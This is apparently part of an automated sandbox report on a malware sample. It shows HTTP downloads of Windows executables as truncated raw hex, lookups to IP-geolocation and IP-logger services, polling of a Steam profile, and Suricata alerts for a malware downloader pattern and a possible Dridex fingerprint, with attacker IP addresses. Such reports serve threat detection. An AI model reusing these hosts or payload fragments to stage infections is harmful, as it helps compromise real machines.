65 6c 6f 63 00 00 0c 00 00 00 00 20 05 00 00 02 00 00 00 e4 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 fb 04 00 00 00 00 00 48 00 00 00 02 00 05 00 e8 ea 04 00 e8 0e 00 00 03 00 02 00 0d 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b3 c4 ec e9 36 88 b4 d0 0b 05 5a 9d a5 06 39 29 a5 e8 5e 89 9d ab ca 8a 86 a6 c2 97 d4 6a cf bf 0a e3 50 74 59 93 23 b6 c9 41 ea 52 a8 5c 17 18 f8 64 ee 84 34 14 f3 a5 37 00 5a 01 8d 26 77 8a 77 7c 93 35 da 27 3a 88 54 08 93 2a 7e e8 f4 fc 78 96 88 ad 80 54 89 de 03 37 4d d6 77 d3 53 61 c7 bb d5 91 02 51 70 05 52 aa 74 95 75 8a 8f 11 71 7a 44 28 26 84 cb 04 34 9c 8a 20 ab 3a 4f ff 64 83 8d aa 97 56 5b 9f 20 63 f0 f5 6c 9a 70 72 4b 7f 5d 9b d5 84 76 c5 c1 87 b4 59 5c 5f f0 b9 a2 7b 94 0f 0f 9c d8 27 84 a1 54 dc 2d 66 cd 16 61 76 d9 f8 e4 8c 77 28 48 93 6e 95 5d ed ae d4 96 67 70 6a 29 d0 c6 b5 0d 4f 4b 56 03 ca 13 98 1c 12 dc 71 f4 bd 51 17 0b 2a 79 0c 50 a1 21 c2 f0 59 3b 4f 2e 30 cc 8c f9 fb a3 b6 40 94 79 04 8a 0c 74 a7 22 bb 75 f6 b2 09 37 6e 92 42 95 3d 1b a8 0f b5 82 c5 e9 43 5e d8 3d 11 4d 69 88 16 91 f4 f3 10 34 95 b1 1d d9 d0 01 62 ce 9a 7e 8b 07 74 ee e2 ba 64 88 d8 2e aa e7 c4 db 23 d
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:10 GMTContent-Type: application/octet-streamContent-Length: 11496960Last-Modified: Wed, 18 Sep 2024 05:25:37 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ea6451-af6e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 64 86 0a 00 ad 2b dd 66 00 00 00 00 00 00 00 00 f0 00 23 00 0b 02 0e 00 00 82 00 00 00 06 cd 00 00 00 00 00 5d 70 fd 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 a8 01 00 04 00 00 00 00 00 00 02 00 20 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 90 d1 fd 00 3c 00 00 00 00 50 a5 01 d8 04 03 00 40 16 a5 01 60 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 46 00 01 28 00 00 00 00 15 a5 01 38 01 00 00 00 00 00 00 00 00 00 00 00 d0 f8 00 20 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 81 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b8 1e 00 00 00 a0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 e7 c9 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 80 01 00 00 00 b0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 10 00 00 00 00 c0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 10 00 00 00 00 d0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 30 00 00 70 e4 2d 00 00 e0 ca 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 31 00 00 58 00 00 00 00 d0 f8 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 65 78 74 32 00 00 a0 60 ac 00 00 e0 f8 00 00 62 ac 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 68 2e 72 73 72 63 00 00 00 d8 04 03 00 00 50 a5 01 00 06 03 00 00 68 ac 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:12 GMTContent-Type: application/octet-streamContent-Length: 361336Last-Modified: Fri, 20 Sep 2024 18:02:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66edb89b-58378"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 0d b7 ed 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 50 05 00 00 08 00 00 00 00 00 00 ee 6e 05 00 00 20 00 00 00 80 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 c0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 6e 05 00 53 00 00 00 00 80 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 00 5a 05 00 78 29 00 00 00 a0 05 00 0c 00 00 00 60 6d 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 4e 05 00 00 20 00 00 00 50 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 80 05 00 00 06 00 00 00 52 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 05 00 00 02 00 00 00 58 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 6e 05 00 00 00 00 00 48 00 00 00 02 00 05 00 d8 5e 05 00 88 0e 00 00 03 00 02 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 09 9a 24 d3 fa 09 ed 73 70 1d d9 10 6b b3 54 61 ce ca 81 de fd fe 7c e7 b4 4b e4 c3 3f 77 4e 05 10 b3 2d 18 d3 6d df 0d 45 a5 89 ee 8f 43 8d 39 ec a5 d3 9d 2d 23 0f dd 0c b9 66 92 cc 3d ba 9b 1b 35 73 70 4a fe c5 d8 0f fd ee a3 7a 03 73 d5 d2 5f 34 76 15 5a 55 4f c7 91 77 a3 b4 81 62 fd 0c 01 6e 65 bf 73 52 13 b9 76 40 73 4f d6 34 d0 9d 5d 20 0d ee 1c ff 14 a1 56 c3 4c 93 f6 87 1e d4 b7 54 56 5b 1b 58 ec 76 46 04 19 02 b7 f1 c9 7c be e1 68 49 2a b7 d6 9c 24 3c 67 62 f3 e2 e1 76 2d 43 6d 3c 5b 36 52 b2 13 9f 38 a9 e7 86 21 6d 8a b8 bf ac 8c 97 be 87 8a 96 27 bd 3f 6a ee 8f d9 17 a1 57 60 4a 49 e9 c2 21 6b 0a d2 ca bf a3 e0 f1 aa c9 d5 2c 84 4f bd 3c 39 ea c1 57 a9 f9 86 58 ef 97 fe 4c 45 71 f3 d2 07 af 20 21 8c 88 cb d2 e6 f6 51 d9 a2 d9 92 24 bb 40 b3 d8 ef 03 2c 39 39 1b b7 7e 93 cc c8 25 28 f1 e4 d5 5c 16 c7 7c 42 88 1d 23 b2 61 84 fe ef 20 b5 97 d9 1c 0b 85 77 b9 ea b1 5a 56 92 ca 39 b9 6b 8
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:13 GMTContent-Type: application/octet-streamContent-Length: 3037032Last-Modified: Thu, 19 Sep 2024 05:16:47 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ebb3bf-2e5768"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ba f7 20 98 fe 96 4e cb fe 96 4e cb fe 96 4e cb f7 ee dd cb ec 96 4e cb 60 36 89 cb ff 96 4e cb 1b cf 4b ca fc 96 4e cb 23 69 80 cb fa 96 4e cb 23 69 85 cb f0 96 4e cb c5 c8 4d ca f8 96 4e cb c5 c8 4a ca f0 96 4e cb c5 c8 4b ca df 96 4e cb c5 c8 4f ca f8 96 4e cb d9 50 35 cb fc 96 4e cb 69 c8 4f ca d3 96 4e cb fe 96 4f cb 3a 9d 4e cb 69 c8 4b ca a1 96 4e cb 69 c8 4e ca ff 96 4e cb 6c c8 b1 cb ff 96 4e cb fe 96 d9 cb ff 96 4e cb 69 c8 4c ca ff 96 4e cb 52 69 63 68 fe 96 4e cb 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 81 9f 25 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 38 12 00 00 02 1c 00 00 00 00 00 1e 24 10 00 00 10 00 00 00 50 12 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 2e 00 00 04 00 00 9a d5 21 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 90 25 18 00 c4 a8 00 00 54 ce 18 00 5c 03 00 00 00 20 1b 00 d8 66 13 00 00 00 00 00 00 00 00 00 00 3e 2e 00 68 19 00 00 00 d0 1f 00 90 09 02 00 90 29 15 00 54 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 44 2a 15 00 18 00 00 00 e8 29 15 00 40 00 00 00 00 00 00 00 00 00 00 00 00 50 12 00 b8 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 00 40 12 00 00 10 00 00 00 38 12 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 00 30 08 00 00 50 12 00 00 28 08 00 00 3c 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 00 80 00 00 00 80 1a 00 00 6e 00 00 00 64 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 00 10 00 00 00 00 1b 00 00 02 00 00 00 d2 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 00 10 00 00 00 10 1b 00 00 02 00 00 00 d4 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 d8 66 13 00 00 20 1b 00 00 68 13 00 00 d6 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:15 GMTContent-Type: application/octet-streamContent-Length: 3141632Last-Modified: Fri, 20 Sep 2024 15:45:09 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed9885-2ff000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 09 29 00 00 20 00 00 00 0a 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f4 05 00 00 00 40 29 00 00 06 00 00 00 0e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc d8 06 00 00 60 29 00 00 da 06 00 00 14 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 30 00 00 02 00 00 00 ee 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:48:15 GMTContent-Type: application/octet-streamContent-Length: 3141632Last-Modified: Fri, 20 Sep 2024 15:45:09 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ed9885-2ff000"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 b2 1e 9f cc 00 00 00 00 00 00 00 00 e0 00 0e 01 0b 01 06 00 00 0a 29 00 00 e2 06 00 00 00 00 00 ee 29 29 00 00 20 00 00 00 40 29 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 30 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 0f 00 00 00 00 00 00 00 00 00 00 00 a0 29 29 00 4b 00 00 00 00 60 29 00 bc d8 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 30 00 0c 00 00 00 4f 29 29 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 09 29 00 00 20 00 00 00 0a 29 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 73 64 61 74 61 00 00 f4 05 00 00 00 40 29 00 00 06 00 00 00 0e 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 bc d8 06 00 00 60 29 00 00 da 06 00 00 14 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 30 00 00 02 00 00 00 ee 2f 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                              Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Sat, 21 Sep 2024 12:49:30 GMTContent-Type: application/octet-streamContent-Length: 363424Last-Modified: Thu, 19 Sep 2024 23:31:32 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66ecb454-58ba0"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e b2 ec 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 32 05 00 00 08 00 00 00 00 00 00 7e 51 05 00 00 20 00 00 00 60 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 2c 51 05 00 4f 00 00 00 00 60 05 00 d0 05 00 00 00 00 00 00 00 00 00 00 78 65 05 00 28 26 00 00 00 80 05 00 0c 00 00 00 f4 4f 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 31 05 00 00 20 00 00 00 32 05 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 05 00 00 00 60 05 00 00 06 00 00 00 34 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 80 05 00 00 02 00 00 00 3a 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 51 05 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 41 05 00 14 0e 00 00 03 00 02 00 0c 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 56 65 4f 10 e0 7a 9d 12 3f 5a cb c3 23 e8 83 85 c0 ee 62 e2 17 74 b1 48 16 78 4b 84 98 93 07 c0 f7 fd 2b f2 05 10 2c b9 ae bc 35 37 b0 87 15 04 3e 31 8d 47 32 e9 25 6a f5 ff cb 16 fe 05 c0 75 f2 b8 2d 94 45 c7 b7 6d 52 9a 55 86 1b dd f8 2d 36 57 c8 34 9c 62 57 b2 ae af 35 e3 3e 42 a1 07 08 5d d3 a7 7f 20 04 e2 85 b0 73 b6 c3 66 15 27 af 28 6f b6 fd c7 7d bf e1 bd 6b bc 50 fd e5 71 3e 6a 92 ca 8e e4 5d 5b 54 ab 07 91 c6 db 0c a0 87 2e c4 c8 f9 a5 d1 73 8a 70 7d 48 54 2d 6f 38 2e 8c 1c 07 f1 5e 9a 9f 94 d0 05 70 0f b0 b2 7f d5 4b 37 3f c3 6e 89 74 45 4b 3e 5e e5 8c 38 1c 70 b8 d1 82 cc a5 db f1 2b a0 62 57 8c f6 ee 8b 7b 3a 53 ad b9 fc 6a c7 05 0f 5a 0f ea ae d0 a3 dc 8f b9 aa 7a 8f 64 32 e3 69 c2 a4 e3 ad f4 ee a7 36 35 b9 75 0a 7c bf 76 55 79 31 b8 01 ae f8 23 36 9e eb 08 f1 0f 12 50 14 b7 92 7d f7 24 04 de 8a 4b bf 86 5c 58 d6 a2 f3 fb 12 24 b4 d2 5a db 44 0d fd d2 f6 58 12 d7 71 8f 4b 85 5e 0
                              Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                              Source: unknownDNS query: name: api64.ipify.org
                              Source: unknownDNS query: name: ipinfo.io
                              Source: unknownDNS query: name: iplogger.org
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49711 -> 147.45.44.104:80
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49718 -> 176.111.174.109:80
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49712 -> 103.130.147.211:80
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49713 -> 176.113.115.33:80
                              Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.9:49709 -> 147.45.44.104:80
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49751 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49743 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49747 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49746 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49753 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49754 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49756 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49757 -> 116.203.165.127:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49758 -> 116.203.165.127:443
